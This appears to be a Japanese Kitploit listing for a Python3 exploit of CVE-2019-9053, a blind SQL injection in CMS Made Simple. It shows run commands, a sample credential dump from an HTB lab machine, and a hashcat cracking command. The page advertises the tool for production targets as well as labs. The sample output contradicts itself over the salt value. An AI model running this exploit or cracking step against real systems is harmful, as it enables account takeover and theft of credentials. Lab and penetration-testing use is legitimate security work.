Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cmsms-sqli — CVE-2019-9053(CMS Made Simple <= 2.2.9 SQLi)のPython3エクスプロイト。依存関係なし、時間ベースのブラインドSQLi → 管理者認証情報ダンプ。HTB Writeup owned. | Kitploit
ツール/GitHubGitHub/tim-karov/cmsms-sqli
パスワードクラッキング脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト
GitHubtim-karov/cmsms-sqli

cmsms-sqli

CVE-2019-9053(CMS Made Simple <= 2.2.9 SQLi)のPython3エクスプロイト。依存関係なし、時間ベースのブラインドSQLi → 管理者認証情報ダンプ。HTB Writeup owned.

リポジトリを見る
57ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CMS Made Simple <= 2.2.9 SQLインジェクション (CVE-2019-9053) - Python3 Exploit

元のExploit-DB #46635(作者: Daniele Scanu)のPure Python3移植版。脆弱なCMS Made Simpleインストールから管理者認証情報をダンプするための時間ベースのブラインドSQLi。

🎯 特徴:

✅ 外部依存関係なし(requestsのみ)

✅ Python 3.6+ ネイティブ(f-strings、walrus演算子)

✅ 美しい色付き出力(ANSI)

✅ 安定&高速(平均的な接続で約3〜5分でダンプ)

✅ 本番ターゲット向けタイムアウト/エラーハンドリング

✅ Hashcat対応出力(salt + MD5形式)

🚀 使用方法:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 カスタマイズ:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 クレジット:

原作者: Daniele Scanu

Exploit-DB: #46635

Python3移植&改良: Tim Karov

📄 ライセンス:

MITライセンス - LICENSEを参照


⭐ 役に立ったらStarをお願いします!HTB/TryHackMeのラボや実際のペネトレーションテストで使用されています。

ツールをダウンロード